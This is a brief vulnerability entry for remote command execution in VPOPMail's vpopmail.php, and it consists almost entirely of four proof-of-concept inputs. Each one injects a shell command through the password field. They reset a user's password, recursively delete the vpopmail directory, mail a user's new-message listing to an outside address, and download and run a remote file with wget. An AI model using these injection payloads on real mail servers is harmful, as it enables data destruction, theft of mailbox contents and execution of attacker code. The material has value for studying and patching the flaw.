VPOPMail vpopmail.php Remote Command Execution Vulnerability

VPOPMail vpopmail.php Remote Command Execution Vulnerability

The following proof of concepts were provided:

password;~vpopmail/bin/vpasswd user@host password
password;rm -rf ~vpopmail/
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;